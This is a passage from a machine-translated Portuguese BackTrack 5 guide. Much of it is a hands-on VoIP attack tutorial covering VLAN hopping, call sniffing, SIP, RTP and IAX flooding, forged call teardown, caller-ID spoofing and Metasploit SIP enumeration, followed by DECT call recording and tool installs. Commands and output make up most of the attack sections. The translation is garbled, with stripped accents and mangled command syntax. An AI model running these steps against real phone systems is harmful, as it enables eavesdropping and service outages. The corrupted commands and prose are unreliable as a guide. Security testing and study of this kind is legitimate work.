executar este ataque. Uma topologia comum quando o telefone IP tem um builtin "Switch interno", geralmente o PC est conectado na tomada pc telefone eo
telefone est ligado desde a sua tomada de lan / sw para o switch de rede da
seguinte forma:

Um tpico CISCO configurao da porta do switch para VoIP ser algo parecido
com:
Switch # conf t
Digite os comandos de configurao, um por linha. End com CNTL / Z.
Switch (config) # interface FastEthernet 0/1

Switch (config-if) # switchport acesso de modo


Switch (config-if) # switchport acesso vlan 10
Switch (config-if) # switchport voz VLAN 20

O telefone IP ser configurado com o apropriado VLAN ID (20) eo trfego de


dados PC vai fluir atravs de VLAN 10. Antes de comear pulando por a vamos
ter que activar o suporte para o protocolo 802.1q no Backtrack, digitando:

root @ bt: ~ # modprobe 8021Q

VoIP Hopper
VoIP funil usado para pular em voz Vlan, comportando-se como um telefone IP,
que suporta opes especficas e suporta alguns modelos de telefones IP. Ele
suporta atualmente as marcas como: Cisco, Avaya e Nortel. VoIP funil foi
concebido para ser executado em Linux Backtrack e atualmente tem as seguintes
caractersticas: DHCP Client, CDP Generator, MAC Address Spoofing e VLAN
hopping. Uso Voiphopper:
root @ bt :/ pentest / voip / voiphopper # . / voiphopper
voiphopper-i <interface>-c {0 | 1 | 2}-uma-n-v <VLANID>
Por favor, especifique um modo de opo de base:
CDP Sniff Mode (-c 0)
Exemplo: voiphopper-i eth0-c 0
CDP Spoof Mode com pacotes customizados (-c 1):
-D (Device ID)
-P (Port ID)
-C (Recursos)
-L (Plataforma)
-S (Software)
-U (Duplex)
Exemplo: voiphopper-i eth0-c 1-E 'SIP00070EEA5086'-P 'Porta 1' C-HostL 'Cisco IP Phone 7940'-S 'P003-08-8-00'-U 1
CDP Modo pardia com pr-fabricados de pacotes (-c 2)
Exemplo: voiphopper-i eth0-c 2
Avaya Modo Opo DHCP (-a):
Exemplo: voiphopper-i eth0-a
Modo VLAN Hop (-v VLAN ID):
Exemplo: voiphopper-i eth0-v 200
Nortel Modo Opo DHCP (-n):
Exemplo: voiphopper-i eth0-n

VoIP Hopper oferece muitos modos de ataque por favor use a-h para obter
informaes detalhadas.

Vamos dar uma olhada em um exemplo de sniffing para CDP e executar uma Hop
VLAN para a VLAN de Voz em um ambiente Cisco. Executar VoIP Hopper na
interface Ethernet, da seguinte maneira:
root @ bt :/ pentest / voip / voiphopper # . / voiphopper-i eth0-c 0

VoIP Hopper tambm permite a VLAN para uma VLAN Hop arbitrria, sem cheirar
para CDP. Se voc j conhece a voz VLAN ID ou gostaria de Hop VLAN para outra
VLAN basta especificar o ID de VLAN.
root @ bt :/ pentest / voip / voiphopper # . / voiphopper-i eth0-v 20
VoIP Hopper 1,00 Correndo em modo VLAN Hop ~~~V Tentando hop em VLAN 2
Adicionado VLAN 20 para interface eth0
A tentativa de solicitao de DHCP para a nova interface de eth0.20
eth0.20 Link encap: Ethernet Endereo de HW 00:00 c: 29:84:98: b2
inet6: fe80 :: 20c: 29ff: fe84: 98b2/64 Escopo: Link
UP NOTRAILERS BROADCAST MULTICAST MTU CORRIDA: 1500 Mtrica:
1
RX pacotes: 0 erros: 0 descartados: 0 excesso: 0 quadro: 0
TX pacotes: 9 erros: 0 descartados: 0 excesso: 0 portadora:
0
colises: 0 txqueuelen: 0

RX: 0 bytes (0,0 B) TX bytes: 2274 (2,2 KB)

ACE
ACE outra ferramenta para VLAN hopping muito semelhante ao Voiphopper no
uso e inclui uma opo para descobrir tambm TFTP servidores (servidores de
configurao). Uso ACE:
root @ bt :/ pentest / voip / ace # . / ace
ACE v1.0: Automated Corporativa (Data) Enumerador
Uso: ace [-i interface] [-m endereo mac] [-t endereo IP do servidor
tftp |-c modo cdp |-v voz vlan id |-r vlan interface |-d modo verbose]
-I <interface> Interface (obrigatria) para cheirar / envio de pacotes
-M <MAC endereo (Obrigatrio) endereo MAC do telefone IP da vtima
-T <tftp servidor ip> (Opcional) tftp endereo IP do servidor
-C <cdp modo 0|1> (Opcional) 0 CDP farejar modo, um modo de pardia
CDP
-V <voice vlan id> (Opcional) Digite o voice VLAN ID
-R da VLAN> interface> (Opcional) Remove a interface VLAN
-D (Opcional) Verbose | modo de depurao

Voc pode adicionar manualmente uma vlan hop ou usar o recurso de descoberta

Mode para especificar a voz VLAN ID


Exemplo: ace-i eth0-v 96-m 00:01 E: F7: 28:9 C: 8E
Modo de auto-descoberta voz vlan ID no modo de escuta para CDP
Exemplo: ace-i eth0-c 0-m 00:01 E: 8E: F7: 28:9 C
Modo de auto-descoberta voz vlan ID no modo de spoofing para CDP
Exemplo: ace-i eth0-c 1-m 00:01 E: 8E: F7: 28:9 C

DICA: Para ver o seu endereo MAC em uso de voltar atrs:

root @ bt: ~ # macchanger-s eth0

No importa se voc usou ou voiphopper ace agora voc pode interceptar o


trfego de VoIP com ferramentas como "ucsniff", especificando que recm-criado
interface.
Por exemplo:
root @ bt :/ pentest / voip / ucsniff # ucsniff-i eth0.20 / / / /

Denial Of Service
Um ataque de negao de servio em servios de VoIP pode inutiliz-lo, causando
um dano intencional rede e disponibilidade de sistemas de VoIP. Este ataque
pode ocorrer em dois nveis, padro de ataques de rede de DoS e VoIP
especficas dos. Geralmente vamos enviar toneladas de dados inundando a rede
para consumir todos os seus recursos ou um protocolo especfico para massacrla com toneladas de solicitaes.Vamos dar uma rpida viso geral das
ferramentas disponveis no Backtrack

Inviteflood
Esta ferramenta pode ser utilizada para inundar um alvo com CONVIDAR pedidos
que podem ser usadas para direcionar gateways SIP / proxies e telefones SIP.
root @ bt :/ pentest / voip / inviteflood # . / inviteflood
inviteflood - Verso 2.0
09 de junho de 2006

Uso:
Obrigatrio interface (por exemplo, eth0)
usurio-alvo (por exemplo, "" ou john.doe ou 5000 ou "1 +210555-1212")
domnio de destino (por exemplo enterprise.com ou um endereo
IPv4)
IPv4 addr da meta cheia (ddd.ddd.ddd.ddd)
fase de enchente (ie o nmero de pacotes)
Opcional -Uma ferramenta de inundao "De:" alias (por exemplo
jane.doe)
-I IPv4 endereo IP de origem [padro o endereo IP da
interface]
-S srcport (0 - 65535) [padro bem conhecida porta de
descarte 9]
-D destPort (0 - 65535) [padro bem conhecida SIP porta
5060]
-L linha LineString usado por SNOM [padro em branco]
-S do sono tempo btwn msgs convidam (usec)
-H ajudar - imprimir esse uso
-V modo verbose

A sintaxe de uso bsico se parece com isso:

. / Inviteflood eth0 target_extension domnio_de_destino target_ip


number_of_packets

Enquanto a ferramenta mantm inundando o gateway SIP que vai impedir que os
usurios fazer chamadas telefnicas. Voc pode inundar o SIP Proxy com uma
extenso inexistente, tornando assim gerando um 404 no encontrado apenas
para mant-lo ocupado.

Rtpflood
Rtp inundao usado para inundar um telefone IP de destino com um pacote
UDP contm um conjunto de dados RTP A fim de lanar um ataque bem sucedido
usando rtpflood voc vai precisar saber a porta de escuta RTP no dispositivo
remoto que pretende atacar, por exemplo, x-lite padro sofphone rtp porta 8000.
root @ bt :/ pentest / voip / rtpflood # / rtpflood.
uso:. / rtpflood sourcename DestinationName srcport destport
numpackets SSID timestamp seqno

Iaxflood
IAXFlood uma ferramenta para inundar o protocolo IAX2 que usado pelo
asterisco PBX.
root @ bt :/ pentest / voip / iaxflood # / iaxflood.
de uso:. / iaxflood DestinationName numpackets sourcename

Teardown
Teardown usado para terminar uma chamada enviando uma solicitao bye
. Teardown / eth0 extenso sip_proxy 10.1.101.35 ToTag FromTag callid

Primeiro voc ter que capturar uma resposta SIP vlido OK e utilizar a sua de e
para tags e um valor de identificao vlido chamador.

SIP/2.0 200 OK
Via: SIP/2.0/UDP 192.168.1.105; ramo = z9hG4bKkfnyfaol; recebeu =
192.168.1.105; rport = 5060
From: "200" ; Tag = hcykd
Para: "200" ; Tag = as644fe807
Call-ID: jwtgckolqnoylqf @ backtrack
CSeq: 134 REGISTER
User-Agent: Asterisk PBX
Permitir: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY
Apoiado: substitui
Expira em: 3600
Contato: ; Expira = 3600
Data: Tue, 01 de fevereiro de 2011 17:55:42 GMT
Content-Length: 0

Se voc especificar a opo "-v" opo voc pode ver a carga:


SIP PAYLOAD para o pacote:
BYE sip: 200@192.168.1.104: 5060 SIP/2.0
Via: SIP/2.0/UDP 192.168.1.105:9; ramo = 91ca1ba5-98ee-44d5-917061c30981c565
De: <sip:192.168.1.104>; tag = hcykd
Para: 200 <sip:200@192.168.1.104>; tag = as644fe807
Call-ID: jwtgckolqnoylqf @ backtrack
CSeq: 2000000000 BYE
Max-Forwards: 16
User-Agent: Hacker
Content-Length: 0
Contato: <sip:192.168.1.105:9>

Caller ID Spoofing
Existem vrios mtodos para Caller ID spoofing que no vamos discutir aqui,
porque requer um conjunto diferente de ferramentas e equipamentos que so
irrelevantes para o presente artigo. ID Spoofing chamadas em SIP bastante fcil,
voc s precisa mudar o SIP pedido "INVITE" do cabealho.
CONVIDAM SIP: @ 127.0.0.1 SIP/2.0
Para: <sip:192.168.1.104>
Via: SIP/2.0/UDP 192.168.1.104
De: "Hacker mal"
Call-ID: 14810.0.1.45
CSeq: 1 INVITE
Max-Forwards: 20
Contato: <sip:127.0.0.1>

Vamos dar uma olhada em uma ferramenta que j discutimos chamado Inviteflood
que pode ser usado para enviar falsificado convidar pedidos.

root @ bt :/ pentest / voip / inviteflood # . / inviteflood eth0


192.168.1.104 192.168.1.104 201 1-um "retrocesso"

Atacar VoIP Usando Metasploit


O Metasploit Framework inclui vrios auxiliares e os mdulos dedicados para VoIP
explorao. Voc pode encontr-los usando a funo de pesquisa com palavraschave como "gole" ou "voip". Vamos lanar "msfconsole" e realizar uma busca por
mdulos disponveis:
root @ bt: ~ # msfconsole
msf> Pesquisa gole

Mdulos Metasploit VoIP


Aqui est uma lista completa dos mdulos disponveis para voc de referncia:

Auxiliares
scanner / sip / enumerador - SIP Enumerator Nome de Usurio (UDP) scanner /
sip / enumerator_tcp - SIP Enumerator Usurio (TCP) scanner / sip / options SIP Scanner Endpoint (UDP) scanner / sip / options_tcp - SIP Scanner Endpoint
(TCP) voip / sip_invite_spoof - SIP Invite Spoof

Exploits
windows / sip / aim_triton_cseq - AIM Triton 1.0.4 Buffer Overflow
CSeq windows / sip / sipxezphone_cseq - SIPfoundry sipXezPhone 0.35A
estouro de Campo CSeq windows / sip / sipxphone_cseq - SIPfoundry
sipXphone 2.6.0.27 estouro de buffer CSeq unix / webapp / trixbox_langchoice Trixbox langChoice PHP Incluso de arquivos local

Digitalizao de Dispositivos SIP


Metasploit fornece um gole do scanner auxiliar que vem em dois sabores TCP e
UDP, podemos us-lo para descobrir dispositivos SIP, utilizando o mtodo
OPO: Vamos ver um exemplo da verso UDP: scanner / sip / opes
auxiliares Opes de auxiliares e de uso:

msf> uso auxiliares / scanner / sip / opes


msf auxiliar (options)> mostra opes
Opes de mdulo (auxiliar / scanner / sip / opes):
Nome Descrio de Corrente Obrigatrio
-------------------------------------BATCHSIZE 256 sim O nmero de servidores para sondar em cada
conjunto
CHOST no O endereo do cliente local
CPORT 5060 no A porta do cliente local
Rhosts sim O intervalo de endereos de destino ou identificador
CIDR
RPORT 5060 yes A porta-alvo
Tpicos 1 sim O nmero de threads simultneos
A ningum nenhum nome de usurio O destino a sondar em cada host
msf auxiliar (options)> rhosts 192.168.1.130/24 conjunto
Rhosts => 192.168.1.130/24
msf auxiliar (options)> run
[*] 192.168.1.20 200 agente = 'Grandstream HT-502 V1.2A 1.0.1.35'
verbos = 'INVITE, ACK, OPTIONS, CANCEL, BYE, subscrever, NOTIFY, INFO,
REFER, UPDATE'
[*] 192.168.1.21 200 agente = 'Grandstream HT-502 V1.2A 1.0.1.35'
verbos = 'INVITE, ACK, OPTIONS, CANCEL, BYE, subscrever, NOTIFY, INFO,
REFER, UPDATE'
[*] 192.168.1.22 200 agente = 'Grandstream HT -502 V1.2A 1.0.1.35
'verbos =' INVITE, ACK, OPTIONS, CANCEL, BYE, subscrever, NOTIFY,
INFO, REFER, UPDATE '
[*] 192.168.1.92 200 agente = 'Grandstream HT-502 V1.2A 1,0 .1.35
'verbos =' INVITE, ACK, OPTIONS, CANCEL, BYE, subscrever, NOTIFY,
INFO, REFER, UPDATE '
[*] 192.168.1.140 200 agente = 'Grandstream HT-502 V1.2A 1.0.1.35'
verbos = ' CONVIDAM, ACK, OPTIONS, CANCEL, BYE, subscrever, NOTIFY,
INFO, REFER, UPDATE '
[*] 192.168.1.130 200 servidores = 'Asterisk PBX 1.6.2.13 dos verbos
=' INVITE, ACK, CANCEL, OPTIONS, BYE, REFER , SUBSCRIBE, NOTIFY, INFO
'
[*] 256 digitalizada de 256 hosts (100% completa)
[*] execuo do mdulo Auxiliar concludo

Enumerando as extenses SIP / Usernames


O scanner / sip / enumerador auxiliar pode ser usada para descobrir contas SIP
vlidos, ele suporta dois mtodos de descoberta: OPES e Registre-se, tambm
vem em dois sabores TCP e UDP. Opes auxiliares:
msf> o uso do scanner / sip / enumerador

msf auxiliar (recenseador)> mostrar opes


Opes de mdulo (auxiliar / scanner / sip / enumerador):
Nome Descrio de Corrente Obrigatrio
-------------------------------------BATCHSIZE 256 sim O nmero de servidores para sondar em cada
conjunto
CHOST no O endereo do cliente local
CPORT 5060 no A porta do cliente local
MAXEXT 9999 sim Acabar com extenso
Mtodo Register mtodo Enumerao sim usar as opes / CADASTRE-SE
MINEXT 0 sim Comeando extenso
PADLEN 4 sim Cero comprimento mximo de preenchimento
Rhosts sim O intervalo de endereos de destino ou identificador
CIDR
RPORT 5060 yes A porta-alvo
Tpicos 1 sim O nmero de threads simultneos

Exemplo de uso:

msf auxiliar (recenseador)> Rhosts conjunto 192.168.1.104


Rhosts => 192.168.1.104
msf auxiliar (recenseador)> definir MINEXT 100
MINEXT => 100
msf auxiliar (recenseador)> MAXEXT definir 500
MAXEXT => 500
msf auxiliar (recenseador)> definir PADLEN 3
PADLEN => 3
msf auxiliar (recenseador)> run
[*] usurio Encontradas: 200 <sip:200@192.168.1.104> [Auth]
[*] usurio Encontradas: 201 <sip:201@192.168.1.104> [Auth]
[*] usurio encontrado : 202 <sip:202@192.168.1.104> [Auth]
[*] usurio Encontradas: 203 <sip:203@192.168.1.104> [Auth]
[*] usurio Encontradas: 204 <sip:204@192.168.1.104> [ Auth]
[*] usurio encontrado: 300 <sip:300@192.168.1.104> [AUTH]
[*] Verificadas 1 de 1 anfitries (100% completa)
[*] execuo do mdulo Auxiliar concludo

Caller ID Spoofing auxiliar


O voip / sip_invite_spoof auxiliar ir criar um pedido de convite falso SIP fazer o
anel dispositivo de destino e exibir informao falsa identificao do
chamador. Opes auxiliares:

msf> uso voip / sip_invite_spoof


msf auxiliares (sip_invite_spoof)> mostra opes
Opes de mdulo (auxiliar / voip / sip_invite_spoof):
Nome Descrio de Corrente Obrigatrio
-------------------------------------MSG O Metasploit tem voc, sim, o identificador de chamadas
falsificado para enviar
Rhosts sim O intervalo de endereos de destino ou identificador
CIDR
RPORT 5060 yes A porta-alvo
SRCADDR 192.168.1.1 sim o endereo SIP a chamada falsa est vindo
Tpicos 1 sim O nmero de threads simultneos

Exemplo de uso:

msf auxiliar (sip_invite_spoof)> Rhosts conjunto 192.168.1.104


Rhosts => 192.168.1.104
msf auxiliar (sip_invite_spoof)> run
[*] Envio SIP Falso convite para: 192.168.1.104
[*] digitalizada 1 de 1 anfitries (100% completa)
[*] execuo do mdulo Auxiliar concludo

Explorando os sistemas de VoIP


Metasploit inclui vrios exploits para gole software cliente e at mesmo para a
interface de gerenciamento web PBX Trixbox.
Embora esta no seja uma vulnerabilidade especfica SIP ainda relacionado e
pode permitir um controle completo por um invasor em um PBX.

Palavras Finais
Espero que voc tenha encontrado este documento informativo, por favor, tenha
em mente que Backtrack Linux oferece muitas ferramentas e recursos que no
foram cobertas aqui. Aproveite o tempo para ver alguns dos instrumentos de ler os
manuais e arquivos LEIAME Tenho certeza que voc vai encontrar a ferramenta
certa para o trabalho.
Sinta-se livre para discutir as ferramentas e os mtodos mencionados aqui nos
fruns Linux Backtrack que gostariam de aqui suas idias e experincias de
feedback.
http://www.backtrack-linux.org/forums/

Sobre o autor
Shai haste (aka @ NightRang3r) um Tester Pen tempo integral na Avnet
Segurana da Informao & Gesto de Riscos em Israel; Ele detm o OSCP
segurana ofensiva e certificaes da OSCE (entre outros) e gerencia seu blog
em http://exploit.co.il

Referncias
http://en.wikipedia.org/wiki/Session_Initiation_Protocol
http://tools.ietf.org/html/rfc3261
http://www.hackingvoip.com/

DECT Sniffing Dedected


Este artigo foi contribudo por 5M7X.

URL: http://www.back-track.de/index.php?page=team # smtx

Twitter: ! http://twitter.com/ # / 5M7X

E-mail: 5M7X@mail.ru

AVISO FAT grande e peludo: . ilegal gravar conversas telefnicas EM MUITOS


PASES
Para obter uma lista de leis de privacidade do estado em os EUA,

O que DECT?
http://en.wikipedia.org/wiki/Digital_Enhanced_Cordless_Telecommunications

O problema?
A maioria dos fornecedores no implementar a criptografia em seus dispositivos
para que se possa cheirar-lo com determinado hardware e software.
Para um post anterior sobre o tema, confira: http://www.offensivesecurity.com/backtrack/sniffing-dect-phones -os-details /

Testado em

BackTrack 5 KDE final, com o kernel 2.6.38 x86

Original Dosch & Amand Tipo II PCMCIA

Telefones DECT SIEMENS C1 configurar em modo repetidor

NOTA: Este um software experimental que no muito apoiado activamente


mais!

Instalando dedected
A fim de obter dedected instalado no BackTrack, voc tem a escolha entre:
1. Use dedected dos 5 inversas repositrios.
2. Compil-lo em seu prprio pas, se voc quiser experimentar.

Instalar a partir do repositrio


root @ bt: ~ # apt-get update
root @ bt: ~ # apt-get install dedected

Instalar a partir de fonte


Esta etapa opcional para aqueles que querem construir as ferramentas de
cdigo-fonte.
root
root
root
root
root
root
root

@
@
@
@
@
@
@

bt:
bt:
bt:
bt:
bt:
bt:
bt:

~
~
~
~
~
~
~

#
#
#
#
#
#
#

preparar-kernel-fontes
cd / usr / src / linux
cp-rf include / gerado / * include / linux /
cd / pentest / telefonia
svn co https://dedected.org/svn/trunk dedected_svn
cd dedected_svn / com-on-air_cs-linux /
make && make - C ferramentas

Instalao de algumas ferramentas adicionais


root @ bt: ~ # apt-get-y install audacity

Carregue os drivers de
root @ bt: ~ # cd / pentest / telefonia / dedected / com-on-air_cslinux
root @ bt: ~ # n fazer

Se voc no inserir o seu Dosch & Amand tipo 2 ou tipo 3 ou Voo: # doo carto
PCMCIA faz-lo agora! Em seguida, carregar o driver:
root @ bt: ~ # fazer carga

Verificar se h partes fixas aka FP (estaes rdiobase DECT)


root @ bt: ~ # cd / pentest / telefonia / dedected / com-on-air_cslinux / ferramentas
root @ bt: ~ # . / dect_cli

Se voc precisar de informaes sobre o tipo de uso "ajuda". Se voc mora no


interruptor dos EUA para os EUA / DECT 6 bandas atravs da "banda" de
comando. Vamos permitir someverbosity:
verbo

E iniciar a digitalizao de estaes de base:

fpscan

Aps a digitalizao 2-3 vezes por todos os canais desativar verbosidade, e


interromper a digitalizao:
verbo
parar

Ignorar os telefones que voc no quer para farejar


(por exemplo, seus vizinhos!)
Iniciar um callscan
callscan

Agora pegue seu telefone DECT e fazer um telefonema de teste e espere at ver o
telefonema. Tambm suficiente se voc s obter um tom de discagem. Voc
deve ver algo como
# # # Encontrado nova chamada em 00 82 31 33 73 no canal 7 RSSI 34
parar

Nome do seu basestation se voc quiser:


nome 00 82 31 33 73 stallowned

Despeje todos os telefones encontrados:


despejar

Ignore todos os outros telefones, exceto o seu atravs do seguinte


comando! IMPORTANTE!
ignorar 01 30 95 13 37

Gravar o telefonema
Iniciar automaticially gravao de cada telefonema que detecta:
veiculos

Agora pegue o seu aparelho de telefonia DECT e fazer um testcall. Eu recomendo


chamar um "serivce tempo dizendo" que pode ser alcanado atravs de um
nmero de telefone normal. Voc deve obter algo como isto:
#
#
#
#
#
#
#

#
#
#
#
#
#
#

#
#
#
#
#
#
#

Partida veiculos
Parar DIP
Partida callscan
Tentando sincronizar em 00 82 ab 29 b0
Tem sincronia
Dumping para dump_2011-06-11_21_37_37_RFPI_00_82_ab_b0_29.pcap
Parar DIP

Depois que voc desligou o telefonema do dumping deve parar:

Decodificar a chamada de fluxo de dados


Parar a veiculos:
parar

Decodificar o audiostream fora do despejo bruto


root @ bt: ~ # . / decode.sh

Importe os fluxos em audcia e ouvir as chamadas


Iniciar audcia via "alt + f2" e digite "audcia" e pressione enter. Importar a parte
fixa e parte-hte arquivos wav porttil de / pentest / telefonia / dedected / com-onair_cs-linux / ferramentas via File -.> Import -> udio ou simplesmente "Ctrl + Shift
+ I". Importe os arquivos que terminam em. E pcap_fp.ima.g721.wav.
Pcap_pp.ima.g721.wav.

Jogue o seu telefonema com o boto play:

Dica: se voc s pode ouvir o barulho do telefone parece usar alguns codificao /
criptografia. Voc pode ativar o modo repetidor em seu telefone para que ele
desativa criptografia e voc pode testar se sua configurao est funcionando
corretamente.

Limpe / Atualizar
Se voc precisar recarregar os drivers
root @ bt: ~ # cd / pentest / telefonia / dedected / com-on-air_cslinux
root @ bt: ~ # recarga fazer

Se voc est acabado e querem fazer a limpeza:


root @ bt: ~ # cd / pentest / telefonia / dedected / com-on-air_cslinux
root @ bt: ~ # fazer descarregar
root @ bt: ~ # rm / dev / coa

DECT protocolo

Se voc estiver interessado em mais detalhes sobre o protocolo que voc pode
abrir o arquivo pcap em Wireshark.:

Vdeo: Sniffing telefones DECT com BackTrack 5


http://player.vimeo.com/video/25027253?title=0&amp;byline=0&amp;portrait=0

Sniffing telefones DECT com BackTrack de smtx .

Forensics
Bota Forensics

Desde BackTrack 4 e agora BackTrack 5, voc pode ter notado que BackTrack
tem uma opo Forensics inversas mas o que exatamente isso?

LiveCD e Forensics

Por um longo tempo agora, Linux Live CDs tm sido muito teis para fins de
aquisio forenses nos casos em que por um motivo ou outro, voc no pode
utilizar um bloqueador de gravao hardware. Quando configurado para no
automount unidades, e um pouco de know how, um Linux Live CD pode ser um
bloqueador de gravao maravilhoso software. Para um CD Linux vivo para serem
considerados para este propsito no entanto, da maior importncia que a
utilizao do CD vivo no altera qualquer dados em qualquer forma. Essa a
razo principal que BackTrack foi lanada no passado, BackTrack seria automount
unidades disponveis e utilizar as parties de swap, quando disponveis, fazendo
isso BackTrack poderia ter causado todo tipo de confuso, a mudana dos tempos
de montagem ltimos, alterando dados no disco, e assim por diante . Mas desde
que BackTrack 4 e agora BackTrack 5 que no o caso anymore.

Como?

Ento, vamos ter a colher. Pessoas forenses so muitas vezes detalhista e muito
conservadora, assim como sabemos que seguro usar? Bem, em primeiro lugar o
BackTrack Live CD 5 baseado fora de Casper, e no contm scripts de
automount do sistema de arquivos em tudo. Os scripts de inicializao do sistema
ter sido alterado no modo de boot forense para que BackTrack 5 no ir procurar
ou fazer uso de todas as parties de swap que esto contidos no sistema. Todos
esses scripts foram removidos do sistema.

Verificao :

Para testar esta funcionalidade, ns testamos esse modo de inicializao com


vrias configuraes de hardware. Para cada teste, foi feito o snapshot antes MD5
dos discos do sistema, iniciado no modo de inicializao BackTrack5 forense,
verificaram que no houve sistemas de arquivos foram montados e swap no
estava em uso, fez uma srie de atividades sobre o sistema, em seguida, desligar
o sistema de volta e tomou um instantneo aps MD5. Na comparao dos dois
instantneos MD5, em cada caso eram uma correspondncia, demonstrando
nenhuma alterao nos discos tenha sido feita.

Uso :

Quando voc utiliza Backtrack para fins forenses, certifique-se de no deix-lo


passar por uma bota autnoma. Inicializao padro para Backtrack o modo de
inicializao padro, que ir utilizar as parties de swap, se estiverem
presentes. H um atraso longo agradvel no entanto, assim voc ter tempo de
sobra para selecionar o modo de inicializao apropriada. Alm disso, lembre-se,
esta uma distribuio Linux. altamente recomendvel que voc se familiarizar
com o Linux antes de usar este ou qualquer outro CD Linux Live para qualquer
finalidade forense. Alm disso, no se esquea de verificar as ferramentas
adicionais forenses adicionados Backtrack 5. Ns nos concentramos sobre a
adio de imagens e ferramentas de triagem, mas se voc achar que um dos seus
utilitrios favoritos no est no lugar por favor nos avise para que possamos olhar
para o ter adicionado.

PSAD Instalar

URL: http://www.nanotechfibers.com/

Twitter: ! http://twitter.com/ # / rickflores_

E-mail: nanoquetz9l@nanotechfibers.com

psad: Deteco de Intruso e anlise de log com


iptables
O que AASI?
PSAD uma coleo de trs daemons do sistema leves (dois daemons principais
e um daemon ajudante) que rodam em mquinas com Linux e analisar # iptables
mensagens de log para detectar varreduras de portas e trfego suspeito
outro. Uma implementao tpica executar psad no firewall iptables onde tem # #
o acesso mais rpido para registrar os dados.
Processo de Instalao:

Verifique md5sum, e chave pblica:

root @ bt: ~ # cd / usr / local / src


root @ bt: / usr / local / src # wget
http://cipherdyne.org/psad/download/psad-2.1.7.tar.bz2
root @ bt: / usr / local / src # wget
http://cipherdyne.org/psad/download/psad-2.1.7.tar.bz2.md5
root @ bt: / usr / local / src # wget http://cipherdyne.org /
psad/download/psad-2.1.7.tar.bz2.asc
root @ bt: / usr / local / src # wget http://cipherdyne.org/public_key
root @ bt: / usr / local / src # md5sum - c psad-2.1.7.tar.bz2.md5
psad-2.1.7.tar.bz2: OK
root @ bt: / usr / local / src # gpg - import public_key
root @ bt: / usr / local / src # gpg - verify psad-2.1.7.tar.bz2.asc
# Gpg: Assinatura feita Seg 14 de julho de 2010 18:01:06 BRT usando
DSA chave ID 0D3E7410
# Gpg: Assinatura vlida a partir de "Michael Rash (chave de
assinatura para projetos cipherdyne.org) <mbr@cipherdyne.org>"

Instale AASI:

root @ bt: / usr / local / src # tar xfj psad-2.1.7.tar.bz2


root @ bt: / usr / local / src # cd psad-2.1.7
root @ bt: / usr / local / src / psad-2.1.7 #. / install.pl
# Voc gostaria de instalar as ltimas assinaturas de
#
http://www.cipherdyne.org/psad/signatures (y / n)? y

Iniciar AASI:

Observe que voc ir obter o seguinte erro:


root @ bt :/ usr/local/src/psad-2.1.7 # start / etc / init.d / psad
Psad partida: [*] No foi possvel encontrar mail, edite o / etc /
psad / psad.conf no diretrio / usr / sbin / linha psad 9679.

Para corrigir isso, ser necessrio editar psad.conf localizado em / etc / psad / e
adicione um endereo de e-mail da seguinte forma:

root @ bt :/ usr/local/src/psad-2.1.7 # vim / etc / psad / psad.conf

Tambm confira: Mais referncias

Autor Bio: Paixes so nanoengenharia, Ruby programao, a explorao de


software, explorar o desenvolvimento, hacking de hardware
incorporado. Tambm gosto de levantamento de pesos, natao de combate,
Ninjutsu, Parkour (corrida livre), o Krav Mag e MMA. Eu acredito "pode evoluir
para qualquer coisa que voc quiser com o mental tenacidade disciplina direito,
e condicionamento fsico.

GPGDir Instalar

URL: http://www.nanotechfibers.com/

Twitter: ! http://twitter.com/ # / rickflores_

E-mail: nanoquetz9l@nanotechfibers.com

gpgdir - criptografia diretrio recursiva com GnuPG


O que gpgdir?
gpgdir um script Perl que usa o GnuPG CPAN :: mdulo de interface para
criptografar e descriptografar diretrios usando uma chave gpg especificado em ~
/. gpgdirrc.
Processo de Instalao:

Verifique se a chave pblica:

root @ bt: ~ # cd / usr / local / src /


root @ bt: / usr / local / src # mkdir gpgdir
root @ bt: / usr / local / src # cd gpgdir /
root @ bt: / usr / local / src / # wget gpgdir
http://cipherdyne.org/gpgdir/download/gpgdir-1.9.5.tar.bz2
root @ bt: / usr / local / src / # wget gpgdir
http://cipherdyne.org/gpgdir/ download/gpgdir-1.9.5.tar.bz2.asc
root @ bt: / usr / local / src / # wget gpgdir
http://cipherdyne.org/public_key
root @ bt: / usr / local / src / gpgdir # gpg - importao public_key
root @ bt: / usr / local / src / gpgdir # gpg - verify gpgdir1.9.5.tar.bz2.asc

Instale gpgdir:

root @ bt: / usr / local / src / # tar gpgdir xfj gpgdir-1.9.5.tar.bz2


root @ bt: / usr / local / src / # cd gpgdir gpgdir-1.9.5
root @ bt: / usr / local/src/gpgdir/gpgdir-1.9.5 #. / install.pl

Edite o arquivo de configurao para usar a chave padro do GnuPG:

root @ bt: vim / usr / local / src / gpgdir

Tambm confira: Mais referncias

Autor Bio: Paixes so nanoengenharia, Ruby programao, a explorao de


software, explorar o desenvolvimento, hacking de hardware
incorporado. Tambm gosto de levantamento de pesos, natao de combate,
Ninjutsu, Parkour (corrida livre), o Krav Mag e MMA. Eu acredito "pode evoluir
para qualquer coisa que voc quiser com o mental tenacidade disciplina direito,
e condicionamento fsico.

BUGS CONHECIDOS
Bug Conhecidos nas BackTrack
BackTrack 5 R1

Instalao parece travar em 99%. Este um bug cosmtico introduzida por


ns. D um tempo, ele ainda est copiando!.

motoristas rt2800usb sacanagem. Algumas placas de entrar em modo


monitor, mas no mostram e os dados capturados. Se este for seu caso, tente
compilar drivers personalizados a partir de um ramo compat-wireless. Para
mosre

FAQ
BackTrack Perguntas Frequentes
Acabei de instalar o BackTrack, qual a senha de
root?
O instalador Ubiquity utiliza o nome de usurio "root" e "toor" senha por padro.
Tambm recomendo que voc mude isso assim que voc ter reinicializado e
verificado tudo est funcionando corretamente. Voc pode fazer isso emitindo o
seguinte comando e seguir as instrues.
passwd root

Por que meu teclado param de funcionar quando eu


tento digitar a senha?
No, o teclado ainda est trabalhando.
Quando voc digita sua senha no BackTrack, nada mostrado na tela. Esta uma
medida de segurana para impedir que algum "shoulder surfing" e ser capaz de
ver quanto tempo a sua senha , tornando assim mais difcil para algum que voc
conhece para adivinhar a senha.

Como fao para iniciar o ambiente grfico?


Aps arrancar a partir de DVD / USB ou aps o login em uma instalao HDD,
digite o seguinte comando
startx

BackTrack livre para download?


Sim, e sempre ser.

Vocs oferecem verses de 64 bits ou um gnomo de


BackTrack?
Sim, ns j oferecem 64bit e 32bit ISO, bem como suporte para dispositivos
mveis baseados em ARM. Tanto a verso 32bit e 64bit quer entrar com Gnome
ou KDE. Voc tambm pode usar o Fluxbox como seu WM.

Qual verso devo baixar?


Recomendamos que voc faa o download BackTrack 5. J no apoiar quaisquer
